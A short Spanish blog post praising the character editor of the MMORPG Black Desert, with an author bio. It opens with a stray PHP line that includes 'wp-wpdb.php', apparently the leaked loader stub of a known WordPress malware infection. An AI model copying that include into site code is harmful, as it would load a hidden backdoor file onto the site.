if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); El mejor editor de personajes de la historia – La Fortaleza de LeChuck

El mejor editor de personajes de la historia

Lo admito, soy de los que no le dan más que un par de vueltas al editor de personaje. Se pierde un tiempo precioso con ellos, y yo siempre voy al meollo, suelo editar cuatro cosas o elegir el personaje random (Si a veces casi ni se ve). Aunque cuando hay un editor de personajes tan impresionante como lo que tenemos en este MMORPG llamado Black Desert, en el que posiblemente puedas hacer el personaje de tus sueños (Masculino o femenino, todos felices), puede ser que le dedique más tiempo jugueteando.  Sin duda a Arashi (Elaine) le va a encantar cuando lo vea, le flipan los editores de personaje.


Se trata del editor de personajes más logrado que has visto jamás. No solo por posibilidades, que las hay casi infinitas, sino por la sensación de realidad que dan cada una de las animaciones de los personajes. Es una auténtica barbaridad.

Y en realidad se trata de otro MMORPG Coreano, de esos que se cuentan por decenas, y que a veces buscan desmarcarse de los demás con más dedicación. Sin duda lo mejor de este, va a ser el editor y sus personajes en sí. Qué barbaridad. Si queréis ver algo del juego también, aquí os dejo el enlace de su página en Facebook (Su web está caída del impacto)

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

Dejar un comentario